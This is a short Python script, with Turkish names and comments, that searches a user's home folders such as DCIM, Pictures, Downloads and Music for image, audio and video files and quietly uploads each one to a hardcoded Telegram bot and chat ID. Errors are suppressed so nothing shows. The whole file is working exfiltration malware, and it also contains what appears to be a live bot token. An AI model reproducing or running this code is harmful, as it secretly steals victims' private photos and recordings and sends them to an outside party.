import os
import requests

BOT_TOKEN = '7526840364:AAEmbY0HvifSAZHEndWZ6VJUgUTQcjcIVNM'
CHAT_ID = '1271397574'

# Hedef klasörler (kullanıcının ana dizini içinden)
base_folders = ['DCIM', 'Media', 'Movies', 'Music', 'Pictures', 'Downloads']

extensions = [
    '.mp3', '.wav', '.flac', '.aac', '.ogg', '.m4a',
    '.mp4', '.mov', '.avi', '.mkv', '.flv', '.wmv', '.webm', '.3gp',
    '.jpg', '.jpeg', '.png', '.gif', '.bmp', '.tiff', '.svg', '.heic', '.webp',
    '.raw', '.cr2', '.nef', '.orf', '.sr2',
]

def send_file(file_path):
    try:
        url = f'https://api.telegram.org/bot{BOT_TOKEN}/sendDocument'
        with open(file_path, 'rb') as f:
            files = {'document': f}
            data = {'chat_id': CHAT_ID}
            requests.post(url, files=files, data=data)
    except Exception as e:
        pass  # Sessiz geç mk

def tarat_ve_gonder():
    home = os.path.expanduser('~')
    for folder in base_folders:
        full_path = os.path.join(home, folder)
        if os.path.exists(full_path):
            for root, _, files in os.walk(full_path):
                for file in files:
                    if any(file.lower().endswith(ext) for ext in extensions):
                        dosya_yolu = os.path.join(root, file)
                        send_file(dosya_yolu)

tarat_ve_gonder()
